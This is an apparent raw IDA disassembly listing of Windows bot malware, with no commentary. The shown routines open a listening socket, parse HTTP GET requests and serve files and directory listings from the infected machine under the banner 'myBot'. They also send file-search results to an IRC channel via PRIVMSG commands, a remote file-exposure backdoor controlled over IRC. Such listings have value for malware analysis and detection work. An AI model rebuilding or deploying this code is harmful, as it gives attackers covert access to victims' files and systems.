var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_41BF70
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call dword_4CB9D4 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_40FEC1
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
push 7FFFFFFFh
push edi
call dword_4CB9FC ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_4CBA70 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40FEC1
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40FBAD: ; CODE XREF: sub_40FAD6+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_4CB9BC ; select
cmp eax, 0FFFFFFFFh
jz loc_40FEBC
xor esi, esi
mov [ebp+var_4], esi
loc_40FBE3: ; CODE XREF: sub_40FAD6+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_4CB8C0 ; __WSAFDIsSet
test eax, eax
jz loc_40FEA7
cmp esi, [ebp+var_C]
jnz short loc_40FC65
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FEA7
xor ecx, ecx
test ebx, ebx
jbe short loc_40FC37
lea edx, [ebp+var_134]
loc_40FC2B: ; CODE XREF: sub_40FAD6+15F�j
cmp [edx], eax
jz short loc_40FC37
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40FC2B
loc_40FC37: ; CODE XREF: sub_40FAD6+14D�j
; sub_40FAD6+157�j
cmp ecx, ebx
jnz short loc_40FC54
cmp ebx, 40h
jnb short loc_40FC54
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_40FC54: ; CODE XREF: sub_40FAD6+163�j
; sub_40FAD6+168�j
cmp eax, [ebp+var_8]
jbe loc_40FEA7
mov [ebp+var_8], eax
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FC65: ; CODE XREF: sub_40FAD6+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_41BF70
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41BF70
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call dword_4CB9EC ; recv
test eax, eax
jg short loc_40FCF8
push esi
call dword_4CBA6C ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40FEA7
lea eax, [ebp+var_134]
loc_40FCB7: ; CODE XREF: sub_40FAD6+1EB�j
cmp [eax], esi
jz short loc_40FCC8
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FCB7
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FCC8: ; CODE XREF: sub_40FAD6+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FCEC
lea eax, [ebp+ecx*4+var_134]
loc_40FCD6: ; CODE XREF: sub_40FAD6+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FCD6
loc_40FCEC: ; CODE XREF: sub_40FAD6+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FCF8: ; CODE XREF: sub_40FAD6+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_41BF70
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_41B9C0
add esp, 10h
test eax, eax
jbe loc_40FEA7
loc_40FD26: ; CODE XREF: sub_40FAD6+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_40FDCB
mov esi, offset aGet_0 ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_40FD9F
lea eax, [ebp+var_18F0]
push eax
call sub_41B9C0
cmp eax, 5
pop ecx
jbe short loc_40FD9F
mov eax, offset asc_42CDC0 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_41C2E0
pop ecx
pop ecx
push eax
call sub_41C2E0
pop ecx
pop ecx
push eax
call sub_41CAD4
push eax
lea eax, [ebp+var_23C]
push eax
call sub_41C890
add esp, 10h
jmp short loc_40FDB6
; ---------------------------------------------------------------------------
loc_40FD9F: ; CODE XREF: sub_40FAD6+27F�j
; sub_40FAD6+291�j
lea eax, [ebp+var_18F0]
push offset asc_4349EC ; "\r\n"
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_40FDEA
loc_40FDB6: ; CODE XREF: sub_40FAD6+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41BF70
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40FDCB: ; CODE XREF: sub_40FAD6+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_41B9C0
cmp [ebp+arg_0], eax
pop ecx
jb loc_40FD26
jmp loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FDEA: ; CODE XREF: sub_40FAD6+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40FE34
lea eax, [ebp+var_134]
loc_40FDF6: ; CODE XREF: sub_40FAD6+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40FE07
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FDF6
jmp short loc_40FE37
; ---------------------------------------------------------------------------
loc_40FE07: ; CODE XREF: sub_40FAD6+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FE2B
lea eax, [ebp+ecx*4+var_134]
loc_40FE15: ; CODE XREF: sub_40FAD6+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FE15
loc_40FE2B: ; CODE XREF: sub_40FAD6+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40FE37
; ---------------------------------------------------------------------------
loc_40FE34: ; CODE XREF: sub_40FAD6+318�j
mov esi, [ebp+var_4]
loc_40FE37: ; CODE XREF: sub_40FAD6+32F�j
; sub_40FAD6+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_40FEA0
lea eax, [ebp+var_360]
push eax
call sub_41B9C0
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_41B9C0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_40FEA0
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_4CBA70 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_4100B4
add esp, 14h
jmp short loc_40FEA7
; ---------------------------------------------------------------------------
loc_40FEA0: ; CODE XREF: sub_40FAD6+369�j
; sub_40FAD6+38F�j
push esi
call dword_4CBA6C ; closesocket
loc_40FEA7: ; CODE XREF: sub_40FAD6+11D�j
; sub_40FAD6+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40FBE3
jmp loc_40FBAD
; ---------------------------------------------------------------------------
loc_40FEBC: ; CODE XREF: sub_40FAD6+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_40FEC1: ; CODE XREF: sub_40FAD6+6A�j
; sub_40FAD6+92�j ...
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_4349C4
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40FF07
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_409869
add esp, 14h
loc_40FF07: ; CODE XREF: sub_40FAD6+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_415D38
pop ecx
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_254]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_40FAD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF31 proc near ; DATA XREF: sub_4100B4+24D�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_41C500
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax
lea eax, [ebp+var_654]
push eax
call sub_41C266
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_40FF97
push offset aTextHtml ; "text/html"
jmp short loc_40FF9C
; ---------------------------------------------------------------------------
loc_40FF97: ; CODE XREF: sub_40FF31+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_40FF9C: ; CODE XREF: sub_40FF31+64�j
lea eax, [ebp+var_9C]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_427110 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_42710C ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_410015
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41C266
add esp, 24h
jmp short loc_410036
; ---------------------------------------------------------------------------
loc_410015: ; CODE XREF: sub_40FF31+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41C266
add esp, 28h
loc_410036: ; CODE XREF: sub_40FF31+E2�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call dword_4CBA24 ; send
cmp [ebp+var_A4], edi
jnz short loc_410076
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_4109F1
pop ecx
pop ecx
jmp short loc_410093
; ---------------------------------------------------------------------------
loc_410076: ; CODE XREF: sub_40FF31+12D�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_41036B
add esp, 10h
loc_410093: ; CODE XREF: sub_40FF31+143�j
push [ebp+var_44C]
call dword_4CBA6C ; closesocket
push [ebp+var_B4]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_40FF31 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100B4 proc near ; CODE XREF: sub_40FAD6+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_41BF70
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_4100EA
push eax
push offset aS_9 ; "\\%s"
jmp short loc_4100F3
; ---------------------------------------------------------------------------
loc_4100EA: ; CODE XREF: sub_4100B4+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_8 ; "%s"
loc_4100F3: ; CODE XREF: sub_4100B4+34�j
lea eax, [ebp+var_10C]
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_41B9C0
test eax, eax
pop ecx
jbe short loc_41018E
mov [ebp+arg_8], 2
loc_41011E: ; CODE XREF: sub_4100B4+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_41B9C0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_41015E
cmp [ebp+esi+var_10C], 25h
jnz short loc_41015E
cmp [ebp+esi+var_10B], 32h
jnz short loc_41015E
cmp [ebp+esi+var_10A], 30h
jnz short loc_41015E
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_410178
; ---------------------------------------------------------------------------
loc_41015E: ; CODE XREF: sub_4100B4+7A�j
; sub_4100B4+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_41016E
push 5Ch
pop eax
jmp short loc_410171
; ---------------------------------------------------------------------------
loc_41016E: ; CODE XREF: sub_4100B4+B3�j
movsx eax, al
loc_410171: ; CODE XREF: sub_4100B4+B8�j
mov [ebp+ebx+var_210], al
loc_410178: ; CODE XREF: sub_4100B4+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_41B9C0
cmp esi, eax
pop ecx
jb short loc_41011E
loc_41018E: ; CODE XREF: sub_4100B4+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS ; "%s%s"
push eax
call sub_41C266
lea eax, [ebp+var_314]
push offset asc_42A080 ; "\n"
push eax
call sub_41CAD4
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_4101DF
cmp eax, 0FFFFFFFFh
jnz short loc_4101E2
push [ebp+arg_0]
jmp loc_410262
; ---------------------------------------------------------------------------
loc_4101DF: ; CODE XREF: sub_4100B4+11C�j
mov [ebp+var_4], esi
loc_4101E2: ; CODE XREF: sub_4100B4+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_4101EF
mov [ebp+var_4], esi
loc_4101EF: ; CODE XREF: sub_4100B4+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_41026D
cmp [ebp+arg_C], edi
jz short loc_410261
lea eax, [ebp+var_314]
push offset asc_434C78 ; "*"
push eax
call sub_41C8A0
pop ecx
lea eax, [ebp+var_314]
pop ecx
push eax
lea eax, [ebp+var_640]
push eax
call sub_41C266
lea eax, [ebp+var_210]
push eax
call sub_410AAE
add esp, 0Ch
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_41C266
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_4102BC
; ---------------------------------------------------------------------------
loc_410261: ; CODE XREF: sub_4100B4+152�j
push ebx
loc_410262: ; CODE XREF: sub_4100B4+126�j
call dword_4CBA6C ; closesocket
jmp loc_410364
; ---------------------------------------------------------------------------
loc_41026D: ; CODE XREF: sub_4100B4+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:dword_4270F8 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4102BC
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41C266
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_427114 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_427070 ; CloseHandle
loc_4102BC: ; CODE XREF: sub_4100B4+1AB�j
; sub_4100B4+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_434C44
push eax
call sub_41C266
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_40B3BA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43E914[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40FF31
push edi
push edi
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43E924[ecx], eax
jz short loc_410336
loc_410324: ; CODE XREF: sub_4100B4+280�j
cmp [ebp+var_318], edi
jnz short loc_410364
push 5
call ds:dword_427080 ; Sleep
jmp short loc_410324
; ---------------------------------------------------------------------------
loc_410336: ; CODE XREF: sub_4100B4+26E�j
push ebx
call dword_4CBA6C ; closesocket
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_434C0C
push eax
call sub_41C266
lea eax, [ebp+var_8C4]
push eax
call sub_415D38
add esp, 10h
loc_410364: ; CODE XREF: sub_4100B4+1B4�j
; sub_4100B4+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4100B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41036B proc near ; CODE XREF: sub_401ACD+75E3�p
; sub_40FF31+15A�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_41BF70
mov edi, [ebp+arg_0]
push offset asc_42A080 ; "\n"
push edi
call sub_41CAD4
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_4103CA
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41C360
add esp, 14h
jmp loc_4104C9
; ---------------------------------------------------------------------------
loc_4103CA: ; CODE XREF: sub_41036B+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_4104AF
call sub_41B9C0
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push edi
call sub_41B9C0
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 0Ch
jmp short loc_4104C9
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_41036B+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 10h
loc_4104C9: ; CODE XREF: sub_41036B+5A�j
; sub_41036B+142�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp [ebp+arg_C], ebx
jz short loc_410564
push [ebp+arg_C]
call sub_41B9C0
cmp eax, 2
pop ecx
jbe short loc_410564
push [ebp+arg_C]
call sub_41B9C0
sub eax, 3
pop ecx
jz short loc_410515
loc_410509: ; CODE XREF: sub_41036B+1A8�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_410515
dec eax
jnz short loc_410509
loc_410515: ; CODE XREF: sub_41036B+19C�j
; sub_41036B+1A5�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_41BFD0
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
loc_410564: ; CODE XREF: sub_41036B+180�j
; sub_41036B+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_427124 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:dword_427120 ; FindNextFileA
test eax, eax
jz loc_410954
mov edi, 1FFh
loc_410590: ; CODE XREF: sub_41036B+5E3�j
cmp [ebp+var_388], ebx
jz loc_41093C
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_41093C
lea eax, [ebp+var_35C]
push offset a__0 ; "."
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_41093C
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_42711C ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_427118 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm_0 ; "PM"
cmp ax, 0Ch
ja short loc_410605
mov ecx, offset aAm ; "AM"
loc_410605: ; CODE XREF: sub_41036B+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_410611
sub eax, 0Ch
loc_410611: ; CODE XREF: sub_41036B+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_41C266
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4107B4
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_410685
lea eax, [ebp+var_35C]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_4108FD
; ---------------------------------------------------------------------------
loc_410685: ; CODE XREF: sub_41036B+2E0�j
cmp [ebp+arg_C], ebx
jz loc_41076F
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_4 ; "%s%s/"
push edi
push eax
call sub_41C360
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+var_35C]
push eax
call sub_41B9C0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_410725
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_41072A
; ---------------------------------------------------------------------------
loc_410725: ; CODE XREF: sub_41036B+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_41072A: ; CODE XREF: sub_41036B+3B8�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4108FE
; ---------------------------------------------------------------------------
loc_41076F: ; CODE XREF: sub_41036B+31D�j
lea eax, [ebp+var_35C]
push eax
push offset aS_2 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41C360
add esp, 14h
jmp loc_41090D
; ---------------------------------------------------------------------------
loc_4107B4: ; CODE XREF: sub_41036B+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4107F3
push ebx
push [ebp+var_368]
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi
loc_4107DF: ; CODE XREF: sub_41036B+577�j
lea eax, [ebp+var_248]
push eax
call sub_41C360
add esp, 1Ch
jmp loc_41090D
; ---------------------------------------------------------------------------
loc_4107F3: ; CODE XREF: sub_41036B+44F�j
cmp [ebp+arg_C], ebx
jz loc_4108E7
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS ; "%s%s"
push edi
push eax
call sub_41C360
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
